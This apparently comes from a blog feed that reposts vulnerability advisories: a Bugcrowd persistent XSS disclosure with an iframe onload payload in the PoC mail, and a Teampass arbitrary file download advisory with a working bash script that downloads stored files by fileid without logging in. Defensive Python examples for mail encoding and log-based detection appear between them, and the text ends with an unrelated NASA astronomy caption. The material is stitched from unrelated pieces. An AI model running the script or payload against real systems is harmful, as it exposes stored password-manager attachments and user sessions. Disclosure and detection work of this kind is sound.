
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable `code compiler` input field. Restrict the input field and disallow usage of special chars. Encode the mail message body context that is getting transferred by the code module input to the email body context.

Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the iOS app is estimated as medium. (CVSS 3.4)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [http://ift.tt/1jnqRwA]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x
Social: twitter.com/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab
Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS
Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1oSBx0A

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Bugcrowd Bug Bounty #7 - Persistent Web Vulnerability

Document Title:
===============
Bugcrowd Bug Bounty #7 - Persistent Web Vulnerability

References (Source):
====================
http://ift.tt/1Wmvfob
ID: b40f63ed19074014df808599e44684f6a18bb6f4f51cf21948ef78df2f56c13b

Release Date:
=============
2016-05-10

Vulnerability Laboratory ID (VL-ID):
====================================
1830

Common Vulnerability Scoring System:
====================================
3.8

Product & Service Introduction:
===============================
From the outback to the valley, Bugcrowd is paving the way for crowdsourced security. Founded in 2012 in Australia by Casey Ellis, Bugcrowd is now based in San Francisco and is backed by Costanoa Venture Capital, Rally Ventures, Paladin Capital Group and Blackbird Ventures.

(Copy of the Homepage: http://ift.tt/1OVZRKx )

Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered an application-side vulnerability in the official Bugcrowd online service web-application.

Vulnerability Disclosure Timeline:
==================================
2016-04-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-04-21: Vendor Notification (Bugcrowd - Bug Bounty Program)
2016-**-**: Vendor Fix/Patch (Bugcrowd - Bug Bounty Program)
2016-05-03: Acknowledgement & Bug Bounty (Bugcrowd - Bug Bounty Program)
2016-05-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Bugcrowd
Product: Online Service - Web Application 2016 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent script code injection and application-side mail encode web vulnerability has been discovered in the official Bugcrowd online service web-application. The vulnerability type allows an attacker to inject own malicious script code to the application-side of the vulnerable service function or web modules context.

The bugcrowd service allows to register by a web form in the webpage to receive new information like "... Bugcrowd`s Next Chapter". In the name values attackers are able to inject malicious script codes. In an advisory sent to bugcrowd about 1 year ago we already mentioned the problem but your team was not able to verify the bug finally. This time we exploited the bug by using casey ellis wrong encoded context of the bugcrowd registered users to stream the code with the service emails.

The injection point is the form registration for receiving information of bugcrowd and the execution point is the email body context with the broken encode values. The code directly executes after the arrival in the main body context and the sender of the email was the mail support@bugcrowd inbox.

The security risk of the application-side cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.7. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] Firstname
[+] Lastname
[+] Companyname

Affected Module(s):
[+] Email Community Letter - (community@bugcrowd.com)

Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Email: We've raised money, here's what's next from Bugcrowd (community@bugcrowd.com) - Casey Ellis

Hi "><[PERSISTENT INJECTED SCRIPT CODE EXECUTION!]")" <="" "="">&lt;iframe src=a onload=alert("PENTEST") &lt;,&lt;/p&gt; &lt;p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%"&gt;As you may have&amp;nbsp;already heard, this morning we &lt;a href="http://ift.tt/1TDBMXY" style="-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%" data-hs-link-id="0"&gt;announced our $15M Series B funding&lt;/a&gt;. We're proud to have many of our previous investors joining us again, as well as pleased to welcome new investors to the family. &lt;br&gt;&lt;br&gt;We couldn't have done this without you. With your help we've built a massive&amp;nbsp;community of hackers, made up of diverse and talented folks from all over the world.&lt;br&gt;&lt;br&gt;We've got lots of plans for what's next and I've shared those details on our blog. Please check it out to learn more.&lt;br&gt;&lt;br&gt;&lt;strong&gt;&lt;a href="http://ift.tt/1OW0AeP" style="-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%" data-hs-link-id="1"&gt;Read about our plans for Bugcrowd's next chapter&lt;/a&gt;.&lt;/strong&gt; &lt;/p&gt;&lt;p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%"&gt;Thank you joining us on this journey. There's so much more to come! 
We hope you'll &lt;a href="https://twitter.com/Bugcrowd/status/722904657366884353" style="-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%" data-hs-link-id="0"&gt;join us today in our celebration&lt;/a&gt; of this Bugcrowd community milestone.&lt;/p&gt; &lt;p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%"&gt;Sincerely,&lt;/p&gt; &lt;p style="margin-bottom: 1em; -webkit-text-size-adjust:100%; -ms-text-size-adjust:100%"&gt;Casey Ellis&lt;br&gt;Bugcrowd Founder &amp;amp; CEO&lt;/p&gt;&lt;/div&gt;

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable firstname, lastname and company values in the add POST method request. Disallow the usage of special chars in the name values, encode the inputs as well to prevent further exploitation. Encode as well outgoing emails to ensure that no malicious script code injection can take place with application-side attack vector.

Security Risk:
==============
The security risk of the filter bypass issue and application-side arbitrary script code injection web vulnerability is estimated as medium. (CVSS 3.8)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://ift.tt/1jnqRwA] [http://ift.tt/1TDrAB7.]

Source: Gmail -> IFTTT-> Blogger
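
Both the Bashi advisory and the Bugcrowd advisory above recommend encoding user-supplied values before they reach an HTML mail body. The following is an added example, not code from either vendor or from Vulnerability Laboratory: the template, function names and addresses are hypothetical, and the sample first name reuses the test string quoted in the PoC mail.

```python
import html
from email.message import EmailMessage
from html.parser import HTMLParser
from string import Template

# Hypothetical newsletter template. The placeholders mirror the advisory's
# vulnerable parameters (Firstname, Lastname, Companyname).
BODY = Template(
    "<div><p>Hi $firstname $lastname,</p>"
    "<p>Thank you for registering $companyname.</p></div>"
)
FIELDS = ("firstname", "lastname", "companyname")
TEMPLATE_TAGS = {"div", "p"}  # the only elements the template itself emits


def render_unsafe(values):
    """Before: registration values are pasted into the HTML body unchanged."""
    return BODY.substitute({k: values[k] for k in FIELDS})


def render_encoded(values):
    """After: each value is HTML-encoded at output time (& < > " ')."""
    return BODY.substitute({k: html.escape(values[k], quote=True) for k in FIELDS})


class _TagCollector(HTMLParser):
    """Records the name of every element start tag found in a body."""

    def __init__(self):
        super().__init__()
        self.tags = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)


def unexpected_tags(body):
    """Outgoing-mail check: elements in the body that the template never emits."""
    collector = _TagCollector()
    collector.feed(body)
    collector.close()
    return sorted(collector.tags - TEMPLATE_TAGS)


def build_message(values, sender, recipient):
    """Build a multipart mail whose HTML part uses the encoded rendering."""
    msg = EmailMessage()
    msg["From"], msg["To"] = sender, recipient
    msg["Subject"] = "Community update"
    # text/plain is never interpreted as markup, so raw values are fine here.
    msg.set_content(f"Hi {values['firstname']} {values['lastname']},\n")
    html_body = render_encoded(values)
    if unexpected_tags(html_body):
        raise ValueError("refusing to send: markup outside the template")
    msg.add_alternative(html_body, subtype="html")
    return msg


# Constructed sample: the first name is the test string from the PoC mail.
SAMPLE = {
    "firstname": '"><iframe src=a onload=alert("PENTEST")>',
    "lastname": "Doe",
    "companyname": "Example & Co",
}

if __name__ == "__main__":
    print("unsafe body adds :", unexpected_tags(render_unsafe(SAMPLE)))
    print("encoded body adds:", unexpected_tags(render_encoded(SAMPLE)))
    print(build_message(SAMPLE, "news@example.org", "user@example.org"))
```

The `unexpected_tags` check works as a regression test in a mail pipeline: any element that appears in a rendered body but not in the template means a value reached the output without encoding.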

[FD] Teampass v2.1.26 - Stored Cross Site Scripting Vulnerability

[FD] Teampass v2.1.25 - Unauthenticated Access Vulnerability

[FD] Teampass v2.1.25 - Arbitrary File Download Vulnerability

Document Title:
===============
Teampass v2.1.25 - Arbitrary File Download Vulnerability

References (Source):
====================
http://ift.tt/1Tk5qCD

Release Date:
=============
2016-05-17

Vulnerability Laboratory ID (VL-ID):
====================================
1843

Common Vulnerability Scoring System:
====================================
8.1

Product & Service Introduction:
===============================
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role.

(Copy of the Homepage: http://teampass.net/ )

Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered an arbitrary file download vulnerability in the Teampass Password Manager v2.1.25 web-application.

Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Peter Kok)
2016-05-12: Vendor Notification (Teampass Security Team)
2016-05-13: Vendor Response/Feedback (Teampass Security Team)
2016-05-15: Vendor Fix/Patch (Teampass Developer Team)
2016-05-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Nils Laumaillé
Product: Teampass Password Manager - Online Service (Web-Application) 2.1.25

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
An arbitrary file download web vulnerability has been discovered in the Teampass Password Manager v2.1.25 web-application. The arbitrary file download vulnerability allows remote attackers to unauthorized download files via GET method request.

The web vulnerability is located in the `downloadFile.php` file. Remote attackers are able to download internal uploaded files without any authentication. The web vulnerability can be exploited by remote attackers without user interaction. The issue is located on the application-side of the web-application and the request method to access is GET.

The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.1. Exploitation of the arbitrary file download vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the arbitrary file download web vulnerability results in unauthorized file access and information disclosure.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] downloadFile.php

Vulnerable Parameter(s):
[+] fileid

Proof of Concept (PoC):
=======================
The arbitrary file download web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open a browser and visit http://ift.tt/1TyWfL8 which will display the message "Hacking attempt..."
2. Get a cookie by visiting the login page http://ift.tt/1OVXeZ8, you don't have to authenticate only visit this page
3. Again visit http://ift.tt/1TyWfL8, now that the cookie is set there is no "Hacking attempt..." message

Files which are attached to items created in teampass can now be downloaded with the url http://ift.tt/1TyW7eG
Just change the fileid in the url to download different stored files

PoC: Exploit
#!/bin/bash
COOKIE=/tmp/teampass.cookie
if [ ! "$1" ]
then
    echo "Usage: $0 [url]"
    exit 0
fi
#Get a valid cookie
curl -c $COOKIE -s "$1" >/dev/null
#get stored files with fileid 1 through 100
for i in $(seq 1 100)
do
    curl -b $COOKIE "$1/sources/downloadFile.php?name=lol&pathIsFiles=0&fileid=$i" -s -o file-$i
    if [ -s "file-$i" ]
    then
        #display the filetype
        file file-$i
    else
        #remove file if empty
        rm -f file-$i
    fi
done
rm -f $COOKIE
exit 0

Solution - Fix & Patch:
=======================
The arbitrary file download vulnerability can be patched by denying access to the `downloadFile.php` without authentication.

Note: The manufacturer fixed the vulnerability and an update is available for download in version 2.1.26.
URL: http://ift.tt/1OVXjfq

Security Risk:
==============
The security risk of the arbitrary file download web vulnerability in the Teampass Password Manager web-application is estimated as high. (CVSS 8.1)

Credits & Authors:
==================
Peter Kok - [http://ift.tt/1TyWiqi]

Source: Gmail -> IFTTT-> Blogger
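
A detection-side view of the pattern the Teampass advisory describes: one client requesting many distinct `fileid` values from `downloadFile.php` in a short time. This is an added example, not Teampass or Vulnerability Laboratory code; the Apache-style log format, the thresholds and the reading of zero-byte responses as unknown ids are assumptions, and the log lines are constructed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
import re
from urllib.parse import parse_qs, urlsplit

# Common/combined log format prefix: client, timestamp, request, status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_download_hit(line):
    """Return (ip, time, fileid, size) for downloadFile.php requests, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/downloadFile.php"):
        return None
    ids = parse_qs(url.query).get("fileid", [])
    if not ids or not ids[0].isdecimal():
        return None
    when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    size = 0 if m["size"] == "-" else int(m["size"])
    return m["ip"], when, int(ids[0]), size


def find_enumeration(lines, min_ids=5, window=timedelta(seconds=60)):
    """Flag clients that request >= min_ids distinct fileid values within window."""
    per_client = defaultdict(list)
    for line in lines:
        hit = parse_download_hit(line)
        if hit:
            per_client[hit[0]].append(hit[1:])
    findings = {}
    for ip, hits in per_client.items():
        hits.sort(key=lambda h: h[0])
        best, left, seen = 0, 0, Counter()
        for when, fileid, _size in hits:
            seen[fileid] += 1
            # Slide the window start forward until it spans at most `window`.
            while when - hits[left][0] > window:
                old = hits[left][1]
                seen[old] -= 1
                if not seen[old]:
                    del seen[old]
                left += 1
            best = max(best, len(seen))
        if best >= min_ids:
            findings[ip] = {
                "distinct_ids": best,
                "requests": len(hits),
                "empty_responses": sum(1 for h in hits if h[2] == 0),
            }
    return findings


# Constructed sample log (documentation addresses). One client walks fileid 1..8
# in eight seconds; size 0 is assumed to mean "no stored file for that id".
SAMPLE_LOG = [
    f'203.0.113.7 - - [17/May/2016:10:00:{i:02d} +0000] '
    f'"GET /sources/downloadFile.php?name=x&pathIsFiles=0&fileid={i} HTTP/1.1" '
    f'200 {0 if i % 3 else 48211}'
    for i in range(1, 9)
] + [
    '198.51.100.20 - - [17/May/2016:10:00:03 +0000] '
    '"GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.20 - - [17/May/2016:10:01:10 +0000] '
    '"GET /sources/downloadFile.php?name=a.pdf&pathIsFiles=0&fileid=12 HTTP/1.1" 200 90112',
    '198.51.100.20 - - [17/May/2016:10:31:44 +0000] '
    '"GET /sources/downloadFile.php?name=b.pdf&pathIsFiles=0&fileid=40 HTTP/1.1" 200 7001',
]

if __name__ == "__main__":
    for ip, info in find_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```

A web server log alone does not show whether the session behind a request was authenticated, so a hit from this rule is a lead to correlate with application login records rather than proof of unauthenticated access.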

Milky Way Over the Spanish Peaks


That's not lightning, and it did not strike between those mountains. The diagonal band is actually the central band of our Milky Way Galaxy, while the twin peaks are actually called the Spanish Peaks -- but located in Colorado, USA. Although each Spanish peak is composed of a slightly different type of rock, both are approximately 25 million years old. This serene yet spirited image composite was meticulously created by merging a series of images all taken from the same location on one night and early last month. In the first series of exposures, the background sky was built up, with great detail being revealed in the Milky Way dust lanes as well as the large colorful region surrounding the star Rho Ophiuchus just right of center. One sky image, though, was taken using a fogging filter so that brighter stars would appear more spread out and so more prominent. As a bonus, the planets Mars and Saturn are placed right above peaks and make an orange triangle with the bright star Antares. Later that night, after the moonrise, the Moon itself naturally illuminated the snow covered mountain tops. via NASA http://ift.tt/1TwOTI0